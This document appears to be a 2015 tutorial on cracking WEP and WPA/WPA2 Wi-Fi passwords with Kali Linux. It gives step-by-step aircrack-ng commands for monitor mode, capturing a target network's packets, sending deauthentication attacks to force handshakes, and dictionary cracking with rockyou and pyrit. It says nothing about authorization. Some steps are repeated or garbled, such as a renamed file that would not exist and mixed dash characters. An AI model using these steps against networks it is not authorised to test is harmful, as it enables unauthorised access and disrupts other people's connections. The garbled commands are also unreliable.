Hack WEP | WPA | WPA2 Protected Wifi Using Kali Linux 2015
How to Crack WEP protected wifi using backtrack terminal.
1. Start kali linux and open terminal in kali linux.
2. Type command : airmon-ng
(Check weather your wireless card is avilable and working properly)
3. Type command : airmon-ng start wlan0
(put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)
4. Type command: airodump-ng mon0
(command to listen to the wireless network around you and get details about them.)
5. Type command : airodump-ng –w File name of packet to save –c Target channel no --bssid BSSID of target name mon0
( eg: airodump-ng –w MTNL-01 –c 3 --bssid 11:22:33:44:55:66 mon0)
(command start capturing the packet to crack the wifi password.)
6. Type command : aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0
(Above command help to capture the packet more faster. if there is only few packets coming then you can try to deauth to generate more data packets with following command)
7. Type command:aircrack-ng MTNL-01.cap
( AirCrack to crack the WEP key )
How to Crack WPA/WPA2 Protected Wi-Fi with dictionary
1. Start kali linux and open terminal in kali linux.
2. Type command : airmon-ng
(Check weather your wireless card is avilable and working properly)
3. Type command : airmon-ng start wlan0
(put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)
4. Type command: airodump-ng mon0
(command to listen to the wireless network around you and get details about them.)
5. Type command : airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
( eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)
(This means airodump-ng has successfully captured the handshake.
6. Type command: sudo aireplay-ng -0 5–a 11:22:33:44:55:66 mon0
[Send directed DeAuth (attack is more effective when it is targeted) ].
7. Type command: aircrack-ng -w wordlist.lst -b 00:11:22:33:44:55 MTNL.cap
[Note: Default directory for wordlist in linux: /usr/share/wordlists/rockyou.txt.gz]
Steps to attach dictionery
[ -w=The name of the dictionary file
-b=The MAC address of the access point
MTNL.cap=The name of the file that contains the authentication handshake ]
1. cp /usr/share/wordlists/rockyou.txt.gz (copy the file to root directory)
2. gunzIP rockyou.txt.gz (UnzIP the file)
3. mv newrockyou.txt wordlist.lst (rename the file from newrockyou to wordlist)
How To Speed Up Wifi Cracking Process using pyrit
In the dictionary and crunch attack, PMKs speed is near 4000 which will take lots of time to crack wifi so use the below trick to increase the speed of attack. This will provide 60000-100000 PMKs depends on client hardware.
1. Start kali linux and open terminal in kali linux.
2. Type command : airmon-ng
(Check weather your wireless card is avilable and working properly)
3. Type command : airmon-ng start wlan0
(put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)
4. Type command: airodump-ng mon0
(command to listen to the wireless network around you and get details about them.)
5. Type command : airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
( eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)
(This means airodump-ng has successfully captured the handshake.
[Note: Default directory for wordlist in linux: /usr/share/wordlists/rockyou.txt.gz]
Steps to attach dictionary
1. cp /usr/share/wordlists/rockyou.txt.gz (copy the file to root directory)
2. gunzIP rockyou.txt.gz (UnzIP the file)
3. mv newrockyou.txt wordlist.lst (rename the file from newrockyou to wordlist)
Download and install pyrit
1. svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn (Download the file)
2. cd pyrit_svn/pyrit/ ./setup.py build install (build and install setup.py file)
3. cd .. (step back to pyrit_svn)
4. Cd cpyrit_calpp (go to cpyrit_calpp directory)
5. Edit setup.py and find VERSION = '0.4.0-dev and change to VERSION = '0.4.1-dev also
find CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include')) and replace with CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))
Save the file and run using below command
6. ./setup.py build install (build and install and edited file)
7. pyrit –e MTNL create_essid (Create essid in pyrit databases)
8. pyrit -i wordlist .lst import_passwords (import the dictionary in pyrit databases)
9. pyrit batch ( create table in pyrit databases
10.pyrit –r MTNL .cap attack_db (perform attack on handshake file)